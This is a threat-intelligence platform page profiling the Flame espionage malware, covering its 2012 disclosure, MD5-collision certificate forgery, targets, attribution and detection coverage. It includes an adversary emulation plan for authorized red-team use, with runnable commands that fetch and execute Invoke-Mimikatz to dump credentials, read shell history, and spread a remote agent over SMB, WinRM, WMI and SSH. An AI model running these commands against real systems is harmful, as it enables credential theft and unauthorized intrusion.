Home/Threat Actor/Flame
Threat Actor

Flame

flame · us_israel_joint_offensive_cyber_speculation · active since 2007-12

Flame (canonical Kaspersky naming derived from main module FROG.DefaultAttacks.A-InstallFlame + MAHER Iranian CERT naming "Flamer" + CrySyS Lab naming "sKyWIper" / "Skywiper" + common alternative naming "Da Flame" per joint canonical May 28, 2012 disclosure simultaneously announced by MAHER Center Iranian National CERT + Kaspersky Lab + CrySyS Lab of Budapest University of Technology and Economics) is a massive ~20MB modular cyber-espionage platform, operationally one of the most complex malware platforms ever found per CrySyS Lab canonical 2012 assessment ("certainly the most sophisticated malware we encountered during our practice.

arguably, it is the most complex malware ever found".

per Kaspersky "twenty times more complicated than Stuxnet") + the first publicly-known cryptographic-attack-as-malware-spread mechanism via signature novel MD5 chosen-prefix collision attack enabling forged Microsoft Update digital certificate masquerading (Centrum Wiskunde & Informatica CWI cryptanalyst Marc Stevens canonical analysis: "Flame uses a completely new variant of a 'chosen prefix collision attack' to impersonate a legitimate security update from Microsoft")

speculatively attributed to US-Israel joint offensive cyber operation cluster cell coherence with Stuxnet Olympic Games operation per Kaspersky shared-development-team attribution hypothesis + adjacent timing/target overlap with Stuxnet (Flame active in the wild since at least February 2010 per Kaspersky, with CrySyS-observed main component filename as early as December 2007)

active 2007-2012+ with operational discovery context of UN International Telecommunication Union ITU commissioning Kaspersky to investigate "Wiper" malware affecting Iranian Oil Ministry computers that caused Iranian officials to disconnect oil terminals from internet April 2012, Kaspersky discovered Flame as separate infection while investigating Wiper.

comprehensive multi-modal surveillance capability (audio recording via microphone + screen capture screenshots + keyboard activity keylogger + network traffic capture + Skype conversation recording + signature Bluetooth beacon contact harvesting from nearby Bluetooth-enabled devices) + Lua embedded scripting + SQLite embedded database within modular platform architecture.

~600 modules / target-organization-specific deployment.

USB stick + LAN + signature Windows Update MitM via forged Microsoft digital certificate propagation.

targets Iran (Oil Ministry primary) + Israel + Sudan + Syria + Lebanon + Saudi Arabia + Egypt + other Middle Eastern countries.

Microsoft response included Microsoft Security Response Center revoking fraudulent intermediate Certificate Authorities + issuing KB2718704 security advisory + updating Terminal Server licensing systems configuration that had enabled the certificate chain abuse (operationally significant Microsoft acknowledgment that Flame's certificate chain abuse exploited configuration error in Terminal Server licensing infrastructure)

operators issued suicide self- destruct command to infected systems shortly after May 28, 2012 disclosure attempting to defeat forensic recovery.

signature false creation date metadata 1994 per CrySyS.

Kaspersky Lessons Learned three-year retrospective May 27, 2015 documented initial industry skepticism ("Flame is lame... A 20 megabytes malware can be l33t? Impossible!") which "died when the Microsoft Windows Updates attack and MD5 collision was found and patched".

fills the 2nd Olympic Games / US- Israel joint cyber-operations cell in the curated corpus following Stuxnet (1st) and operationally precedes Duqu (3rd), operationally significant cluster-cell coherence with Stuxnet + Duqu siblings per Kaspersky shared-development-team attribution hypothesis.

canonical "most complex malware ever found" industry reference point + first publicly-known novel- cryptographic-attack-as-malware-spread mechanism cited in essentially all subsequent state-actor-tier modular cyber-espionage platform industry analyses through 2012-2026 period.

us_israel_joint_offensive_cyber_speculation confidence: high 12 aliases
Sigma rules200 YARA rules1 Live IOCs0 CVEs exploited0

Profile

Flame (canonical Kaspersky naming derived from main module FROG.DefaultAttacks.A-InstallFlame + MAHER Iranian CERT naming "Flamer" + CrySyS Lab naming "sKyWIper" / "Skywiper" + common alternative naming "Da Flame" per joint canonical May 28, 2012 disclosure) is a massive ~20MB modular cyber-espionage platform, operationally one of the most complex malware platforms ever found per CrySyS Lab canonical 2012 assessment ("certainly the most sophisticated malware we encountered during our practice.

arguably, it is the most complex malware ever found") + the first publicly- known cryptographic-attack-as-malware-spread mechanism via signature novel MD5 chosen-prefix collision attack enabling forged Microsoft Update digital certificate masquerading. Speculatively attributed to US-Israel joint offensive cyber operation (cluster cell coherence with Stuxnet Olympic Games operation) per Kaspersky shared- development-team attribution hypothesis + adjacent timing/target overlap with Stuxnet + geographic targeting overlap (Iran + Middle East intelligence- collection mission profile), though formal public attribution remains operationally less explicit than Stuxnet canonical Olympic Games attribution. Active 2007-2012+ per CrySyS observed component date + Kaspersky in-the-wild assessment, with primary operational mission objectives of comprehensive cyber- espionage against Iranian and Middle Eastern targets. Operational phases: (1) FLAME EARLIEST ACTIVITY (December 2007). CrySyS- observed main component filename. (2) FLAME ACTIVE IN THE WILD (February 2010+). Multi- year covert operational deployment. (3) IRANIAN OIL MINISTRY APRIL 2012 INTERNET DISCONNECT. Iranian Students News Agency calls attacking malware "Wiper." (4) UN ITU KASPERSKY INVESTIGATION COMMISSIONING. Kaspersky discovers Flame while investigating Wiper. (5) JOINT CANONICAL DISCLOSURE (May 28, 2012). MAHER + Kaspersky + CrySyS three-organization coordinated disclosure. (6) CWI MARC STEVENS MD5 COLLISION ATTACK ANALYSIS (2012). Novel chosen-prefix collision attack variant analysis. (7) MICROSOFT KB2718704 + CA REVOCATION (June 2012). Fraudulent intermediate CAs revoked + Terminal Server licensing fix. (8) FLAME SUICIDE SELF-DESTRUCT COMMAND (June 2012). Operators issue kill command to infected systems post- disclosure. (9) KASPERSKY LESSONS LEARNED RETROSPECTIVE (2015). Three-year retrospective consolidating canonical industry assessment.

Signature operational tradecraft
  • Massive ~20MB modular cyber-espionage platform architecture (cluster-defining): per CrySyS, "the most complex malware ever found" + per Kaspersky, "twenty times more complicated than Stuxnet"; ~600 modules / target-organization-specific deployment.
  • Microsoft Update MD5 collision attack (cluster- defining cryptographic attack): signature novel chosen-prefix collision attack on MD5 hash function enabling forged Microsoft digital certificate, first publicly-known cryptographic-attack-as-malware-spread mechanism per CWI Marc Stevens canonical cryptanalysis.
  • Joint MAHER + Kaspersky + CrySyS canonical disclosure (signature): three-organization coordinated public disclosure operationally distinct from single- source malware disclosures.
  • Comprehensive multi-modal surveillance capability (signature): audio (microphone) + screen capture + keyboard activity + network traffic + Skype conversation recording + Bluetooth beacon contact harvesting from nearby devices.
  • Lua embedded scripting + SQLite embedded database (signature): signature embedded scripting + persistence infrastructure within modular platform.
  • USB stick + LAN propagation: signature multi- vector propagation including Windows Update MitM via forged certificate.
  • False creation date metadata 1994 (signature): per CrySyS, creation dates falsely set as early as 1994.
  • Suicide self-destruct command (signature): operators issued kill command to infected systems post- public-disclosure to defeat forensic recovery.
  • Documented target footprint: Iran (Oil Ministry + primary target) + Israel + Sudan + Syria + Lebanon + Saudi Arabia + Egypt + other Middle Eastern countries.
  • Cluster-cell-coherence with Stuxnet + Duqu (signature): per Kaspersky shared-development-team hypothesis, operationally significant for cluster- cell coherence of Olympic Games / US-Israel joint cyber-operations cell. The cluster fills the 2nd Olympic Games / US-Israel joint cyber-operations cell in this curated corpus following stuxnet (1st). Operationally significant as the canonical "most complex malware ever found" industry reference point + first publicly-known novel- cryptographic-attack-as-malware-spread mechanism cited in essentially all subsequent state-actor-tier modular cyber-espionage platform industry analyses.

Aliases

12
flameflamerskywiperskywiperda flameworm.win32.flameflame_malwareflame flamer skywiperflame iran middle east cyber espionageflame microsoft update md5 collisiontwenty megabyte malware 2012most complex malware ever found 2012

Adversary Emulation Plan

13 steps
Runnable Caldera emulation profile Worm - Move laterally any way possible. Ordered along the attack lifecycle; each step maps to an ATT&CK technique with a concrete executor command. For authorized red-team / purple-team exercises only.
0 collection T1005 · Data from Local System darwin, linux
Parse SSH config
pip install stormssh && storm list
1 credential-access T1552.003 · Unsecured Credentials: Bash History darwin, linux
Dump history
find ~/.bash_sessions -name '*' -exec cat {} \; 2>/dev/null
2 discovery T1135 · Network Share Discovery windows
View admin shares
Get-SmbShare | ConvertTo-Json
3 discovery T1018 · Remote System Discovery darwin, linux, windows
Collect ARP details
arp -a
4 credential-access T1003.001 · OS Credential Dumping: LSASS Memory windows
Run PowerKatz
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True };
$web = (New-Object System.Net.WebClient);
$result = $web.DownloadString("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/4c7a2016fc7931cd37273c5d8e17b16d959867b3/Exfiltration/Invoke-Mimikatz.ps1");
iex $result; Invoke-Mimikatz -DumpCreds
5 discovery T1018 · Remote System Discovery windows
Find Hostname
nbtstat -A #{remote.host.ip}
6 discovery T1018 · Remote System Discovery windows
Reverse nslookup IP
nslookup #{remote.host.ip}
7 lateral-movement T1021.002 · Remote Services: SMB/Windows Admin Shares windows
Mount Share
net use \\#{remote.host.fqdn}\C$ /user:#{domain.user.name} #{domain.user.password}
8 lateral-movement T1021.002 · Remote Services: SMB/Windows Admin Shares windows
Copy 54ndc47 (SMB)
$path = "sandcat.go-windows";
$drive = "\\#{remote.host.fqdn}\C$";
Copy-Item -v -Path $path -Destination $drive"\Users\Public\s4ndc4t.exe";
9 lateral-movement T1570 · Lateral Tool Transfer windows, darwin, linux
Copy 54ndc47 (WinRM and SCP)
$job = Start-Job -ScriptBlock {
  $username = "#{domain.user.name}";
  $password = "#{domain.user.password}";
  $secstr = New-Object -TypeName System.Security.SecureString;
  $password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)};
  $cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr;
  $session = New-PSSession -ComputerName "#{remote.host.name}" -Credential $cred;
  $location = "#{location}";
  $exe = "#{exe_name}";
  Copy-Item $location -Destination "C:\Users\Public\svchost.exe" -ToSession $session;
  Start-Sleep -s 5;
  Remove-PSSession -Session $session;
};
Receive-Job -Job $job -Wait;
10 execution T1047 · Windows Management Instrumentation windows
Start 54ndc47 (WMI)
$node = '''#{remote.host.fqdn}''';
$user = '''#{domain.user.name}''';
$password = '''#{domain.user.password}''';
wmic /node:$node /user:$user /password:$password process call create "powershell.exe C:\Users\Public\s4ndc4t.exe -server #{server} -group #{group}";
11 lateral-movement T1021.006 · Remote Services: Windows Remote Management windows
Start Agent (WinRM)
$username = "#{domain.user.name}";
$password = "#{domain.user.password}";
$secstr = New-Object -TypeName System.Security.SecureString;
$password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)};
$cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr;
$session = New-PSSession -ComputerName #{remote.host.name} -Credential $cred;
Invoke-Command -Session $session -ScriptBlock{start-job -scriptblock{cmd.exe /c start C:\Users\Public\svchost.exe -server #{server} }};
Start-Sleep -s 5;
Remove-PSSession -Session $session;
12 lateral-movement T1021.004 · Remote Services: SSH darwin, linux
Start 54ndc47
scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-darwin #{remote.ssh.cmd}:~/sandcat.go &&
ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 #{remote.ssh.cmd} 'nohup ./sandcat.go -server #{server} -group red 1>/dev/null 2>/dev/null &'

Notable Campaigns

10
2015Kaspersky Lessons Learned Three Years Later (2015)
2012-2026Continued Industry Reference Status (2012-2026)
2012Iranian Oil Ministry April 2012 Internet Disconnect
2012UN ITU Kaspersky Wiper Investigation Commissioning
2012Flame Canonical Joint Disclosure (May 28, 2012)
2012CWI Marc Stevens MD5 Collision Attack Analysis
2012Microsoft Response KB2718704 + CA Revocation (June 2012)
2012Flame Suicide Self-Destruct Command (June 2012)
2010-2012Flame Active in the Wild (February 2010+)
2007-2008Flame Earliest Activity (December 2007)

Attribution & Reporting

Attributed by
Kaspersky GReAT (canonical May 28 2012 disclosure, multiple researchers)MAHER Center Iranian National Computer Emergency Response Team CERT (canonical May 28 2012 disclosure, initial "Flamer" naming)CrySyS Lab Budapest University of Technology and Economics (canonical May 28 2012 disclosure, "sKyWIper" / "Skywiper" naming, "most complex malware ever found" assessment)United Nations International Telecommunication Union ITU (Kaspersky investigation commissioning)Centrum Wiskunde & Informatica CWI (Marc Stevens canonical chosen-prefix collision attack cryptanalysis)Microsoft Security Response Center (CA revocation + KB2718704 advisory + Terminal Server licensing system fix June 2012)McAfee Labs (Flame Microsoft Update MitM analysis)Iran Atomic Energy Organization (Oil Ministry impact acknowledgment)Symantec (Flame technical analysis)F-Secure (Mikko Hyppönen historical analysis)Iranian Students News Agency (Wiper initial naming reporting)
Key reporting
reportKaspersky GReAT: Flame canonical analysis (Securelist, May 28, 2012), canonical Flame disclosure
reportMAHER Center Iranian National CERT: Flamer analysis (May 28, 2012), canonical Iranian government disclosure
reportCrySyS Lab Budapest University of Technology and Economics: sKyWIper/Skywiper analysis (May 28, 2012), canonical academic disclosure with 'most complex malware ever found' assessment
reportCentrum Wiskunde & Informatica CWI (Marc Stevens): CWI cryptanalyst discovers new cryptographic attack variant in Flame spy malware, canonical chosen-prefix MD5 collision attack analysis
reportMicrosoft Security Response Center: KB2718704 Microsoft Security Advisory (June 2012), canonical Microsoft response with CA revocation
reportMcAfee Labs: Spreading the Flame, Skywiper Employs 'Windows Update', canonical Microsoft Update MitM analysis
reportKaspersky GReAT: Lessons learned from Flame, three years later (Securelist, May 27, 2015), canonical retrospective
reportSymantec: Flame technical analysis (2012)
reportF-Secure (Mikko Hyppönen): Flame historical analysis
reportMITRE ATT&CK Software S0143: Flame
reportMalpedia Software Profile: Flame

Operational

State sponsor

Speculatively attributed to US-Israel joint offensive cyber operation (cluster cell coherence with Stuxnet Olympic Games operation) per multiple convergent analyses, though formal public attribution remains operationally less explicit than Stuxnet canonical Olympic Games attribution. Cluster-cell-coherence attribution basis: (1) Kaspersky shared-development-team attribution hypothesis: per Kaspersky June 2012 follow-up analysis: code overlaps + development conventions + operational similarities between Flame and Stuxnet operationally suggest shared development team or organizational affiliation. Per Kaspersky: "the same development team that created Stuxnet/Duqu also worked on Flame" though Kaspersky operationally framed this as "different functional codebase but shared developer conventions" hypothesis rather than direct codebase shared-provenance attribution. (2) Adjacent timing + target overlap with Stuxnet: per Wikipedia: "According to Kaspersky, Flame had been operating in the wild since at least February 2010", operationally adjacent to Stuxnet deployment timeline (Stuxnet first installed at Natanz 2009, accidentally spread 2010). Per CrySyS Lab: "the file name of the main component was observed as early as December 2007" , operationally suggesting Flame development predates or parallels Stuxnet development cycle. (3) Wiper / Iranian Oil Ministry adjacent impact: per Wikipedia + Infogalactic: Flame discovery context involved Iranian Oil Ministry computers being affected by attack in April 2012 that caused Iranian officials to disconnect oil terminals from the Internet. Iranian Students News Agency initially referred to the attacking malware as "Wiper." Kaspersky believes Flame may be "a separate infection entirely" from Wiper, though Wiper subsequently became operationally associated with Olympic Games adjacent operations per industry analysis. (4) Geographic targeting overlap with Stuxnet: Flame operationally targets primarily Iran + Israel + Sudan + Syria + Lebanon + Saudi Arabia + Egypt and other Middle Eastern countries, operationally consistent with US-Israel Middle East intelligence- collection mission profile. Operational discovery + disclosure context: (a) United Nations International Telecommunication Union (ITU) commissioning: per Wikipedia + Grokipedia: "Kaspersky Lab was asked by the United Nations International Telecommunication Union to investigate reports of a virus affecting Iranian Oil Ministry computers. As Kaspersky Lab investigated, they discovered an MD5 hash and filename that appeared only on customer machines from Middle Eastern nations." Operationally significant ITU-commissioned investigation context, Flame discovery was operationally a byproduct of investigating a different malware (Wiper) affecting Iranian critical infrastructure. (b) Joint MAHER Iran CERT + Kaspersky + CrySyS canonical May 28, 2012 disclosure: three-organization coordinated public disclosure (operationally distinct from typical single-source malware disclosures). MAHER Center of Iranian National CERT had independently detected indicators of compromise associated with the malware referred to by them as "Flamer" a few days earlier and shared these publicly. Concurrently, Laboratory of Cryptography and System Security (CrySyS Lab) at Budapest University of Technology and Economics published their canonical analysis using their internal naming "sKyWIper" / "Skywiper." (c) CrySyS Lab "most complex malware ever found" framing: per CrySyS Lab canonical disclosure: Flame "is certainly the most sophisticated malware we encountered during our practice.

arguably, it is the most complex malware ever found." Per Kaspersky: ~20MB fully-deployed Flame size was operationally unprecedented , "Previously, sophisticated malware would range in the order of kilobytes or hundred of kilobytes.

most people would discard a 6MB executable file as too large to be malware." Per Kaspersky lesson-learned retrospective: "Flame is lame" skeptical industry reaction, complaints died when Microsoft Windows Updates attack and MD5 collision was found and patched. Operational signature Microsoft Update MD5 collision attack (cluster-defining): Per Wikipedia + Grokipedia + CWI + McAfee analysis: Flame featured signature novel chosen-prefix collision attack on the MD5 hash function enabling the malware to forge a valid Microsoft digital certificate for masquerading as a legitimate Windows Update. Operationally significant for first publicly-known cryptographic-attack-as-malware-spread mechanism. Per CWI Marc Stevens canonical cryptanalysis: "Flame uses a completely new variant of a 'chosen prefix collision attack' to impersonate a legitimate security update from Microsoft. Flame's ability stems from the fact that it is signed by a fraudulent certificate appearing to be originating from Microsoft which was obtained by launching a cryptographic collision attack. Analysis of this collision attack using our forensic tools has revealed the use of an as yet unknown variant of our chosen-prefix collision attack." Per McAfee analysis: "the attacker must perform a chosen prefix collision attack targeting an MD5 hash to create a forged certificate and make it acceptable for Vista and later. Years ago a paper titled 'MD5 Considered Harmful Today' authored by Alexander Sotirov, Marc Stevens, Jacob Appelbaum, Arjen Lenstra, David Molnar, Dag Arne Osvik and Benne de Weger described a very similar attack on x.509 certificates." Microsoft response: Microsoft revoked the fraudulent intermediate Certificate Authorities used by Flame in June 2012 + issued KB2718704 advisory + updated Terminal Server licensing systems that had originally enabled the certificate chain abuse. Operational target profile: Documented Flame targets per Kaspersky + CrySyS + MAHER: Iran (primary, Oil Ministry computers operationally affected) + Israel + Sudan + Syria + Lebanon + Saudi Arabia + Egypt + other Middle Eastern countries. Per Wikipedia: "The program is used for targeted cyber espionage in Middle Eastern countries." Operational classification: nation-state-tier cyber- espionage operation operationally adjacent to Stuxnet Olympic Games cluster, operationally significant as the most complex malware ever found per CrySyS canonical 2012 assessment + first publicly-known cryptographic-attack-as-malware-spread mechanism via novel MD5 chosen-prefix collision attack. The cluster fills the 2nd Olympic Games / US-Israel joint cyber-operations cell in this curated corpus following stuxnet (1st). Operationally significant as the canonical "most complex malware ever found" industry reference point + first publicly-known novel- cryptographic-attack-as-malware-spread mechanism.

Motivations
iranian_middle_east_cyber_espionage_intelligence_collection, massive_modular_cyber_espionage_platform_capability_demonstration, signature_microsoft_update_md5_collision_attack_capability_demonstration, comprehensive_multi_modal_surveillance_capability_audio_video_keyboard_skype_bluetooth, iranian_oil_ministry_targeting, middle_east_government_targeting, cluster_cell_coherence_with_stuxnet_olympic_games_operation
Sectors
iranian_oil_ministryoil_and_gas_industrygovernment_officialscritical_infrastructure_operatorsforeign_ministry_officialsintelligence_services_officialsmiddle_east_diplomatic_targetseducational_institutionsprivate_companies
Regions
iranisraelsudansyrialebanonsaudi_arabiaegyptmiddle_east_broadly

Techniques Used

60
T1003T1005T1010T1014T1016T1020T1021T1021.002T1021.006T1027T1027.002T1029T1033T1036T1036.001T1036.005T1039T1041T1053T1056T1056.001T1057T1059T1059.001T1059.005T1059.006T1068T1070T1070.004T1071T1071.001T1071.004T1074T1078T1080T1082T1083T1087T1090T1090.001T1091T1095T1102T1106T1113T1114T1114.001T1119T1123T1125T1129T1133T1140T1190T1203T1213T1218T1497T1518T1543

Detection Blind Spots

60 techniques
Across this actor’s 60 mapped techniques, the share covered by each detection layer. Low bars are where you’d be blind if this actor targeted you.
Behavioral / log (Sigma)56/60 · 93%
Analytics (MITRE CAR)25/60 · 41%
Runtime / container (Falco)7/60 · 11%
File / malware (YARA)0/60 · 0%
Network (Suricata/Snort)15/60 · 25%
Vuln scan (Nuclei)0/60 · 0%

Atomic Test Plan

30 techniques
Runnable Atomic Red Team tests covering this actor’s mapped techniques - validate your detections against this specific adversary. Cross-reference the blind spots above. For authorized lab / purple-team use. Open the full builder

Tools Used

0 mapped
Other tooling / TTPs (curation, not ATT&CK-mapped):
MD5 CHOSEN PREFIX COLLISION ATTACKMICROPHONE AUDIO CAPTURE SURVEILLANCE MODULESCREEN CAPTURE SCREENSHOT SURVEILLANCE MODULESKYPE CONVERSATION RECORDING MODULESQLITE EMBEDDED DATABASESUICIDE SELF DESTRUCT COMMAND 2012
Intelligence Graph · click any node to traverse
CVETechnique ActorTool Family
drag to reposition · click any node to traverse · button top-right enlarges
External lookups - second-class, for what we don’t hold ourselves
MITRE searchMalpediaGoogle
Vulnerabilities
CISA KEV catalog
CWE weaknesses
CAPEC attack patterns
Package vulnerabilities
Threat intelligence
Threat actors
Tools & malware
ATT&CK techniques
IOCs
Detection & defense
Sigma rules
YARA rules
Atomic Red Team tests
D3FEND countermeasures
Compliance
NIST 800-53
ISO 27001:2022
SOC 2 TSC
PCI-DSS v4.0
CIS Controls v8.1
About
All capabilities
Live statistics
Data sources
Privacy policy
Terms of service
threatengine.sh  ·  Open-source threat intelligence platform  ·  100+ authoritative sources  ·  Every fact traces to its origin